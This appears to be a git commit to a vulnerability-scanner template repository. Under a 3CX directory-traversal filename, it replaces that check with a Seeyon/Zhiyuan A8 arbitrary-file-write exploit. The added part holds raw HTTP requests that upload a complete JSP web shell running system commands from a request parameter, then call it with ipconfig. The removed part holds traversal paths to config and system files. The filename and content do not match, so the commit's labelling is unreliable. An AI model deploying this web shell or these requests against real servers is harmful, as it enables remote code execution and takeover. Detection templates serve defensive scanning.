Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs

2022-05-06 15:18:57 -04:00 · 2022-05-06 15:18:57 -04:00 · 7eb4817d1b
parent 800b77e71e
commit 7eb4817d1b
1 changed files with 40 additions and 26 deletions
--- a/vulnerabilities/other/3cx-management-console.yaml
+++ b/vulnerabilities/other/3cx-management-console.yaml
@ -1,35 +1,49 @@
-id: 3cx-management-console
+id: CNVD-2019-19299

 info:
-  name: 3CX Management Console - Directory Traversal
-  author: random-robbie
-  severity: high
-  description: Directory traversal vulnerability on 3CX Management Console.
+  name: Zhiyuan A8 Arbitrary File Write (RCE)
+  author: daffainfo
+  severity: critical
  reference:
-    - https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88
-  metadata:
-    shoda-query: http.title:"3CX Phone System Management Console"
-  tags: 3cx,lfi,voip
+    - https://www.cxyzjd.com/article/guangying177/110177339
+    - https://github.com/sectestt/CNVD-2019-19299
+  tags: zhiyuan,cnvd,cnvd2019,rce

 requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/Electron/download/windows/..\..\..\Http\webroot\config.json'
-      - '{{BaseURL}}/Electron/download/windows/\windows\win.ini'
+  - raw:
+      - |
+        POST /seeyon/htmlofficeservlet HTTP/1.1
+        Host: {{Hostname}}
+        Pragma: no-cache
+        Cache-Control: no-cache
+        Upgrade-Insecure-Requests: 1
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
+        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+        Connection: close

-    stop-at-first-match: true
-    matchers-condition: or
+        DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
+        OPTION=S3WYOSWLBSGr
+        currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
+        = WUghPB3szB3Xwg66 the CREATEDATE
+        recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
+        originalFileId = wV66
+        originalCreateDate = wUghPB3szB3Xwg66
+        FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
+        needReadFile = yRWZdAS6
+        originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
+        <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
+
+      - |
+        GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
    matchers:
-      - type: word
-        part: body
-        words:
-          - "CfgServerPassword"
-          - "CfgServerAppName"
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(body_1, "htmoffice operate")'
+          - 'contains(body_2, "Windows IP")'
        condition: and

-      - type: word
-        words:
-          - "bit app support"
-          - "fonts"
-          - "extensions"
-        condition: and
+# Enhanced by cs on 2022/05/06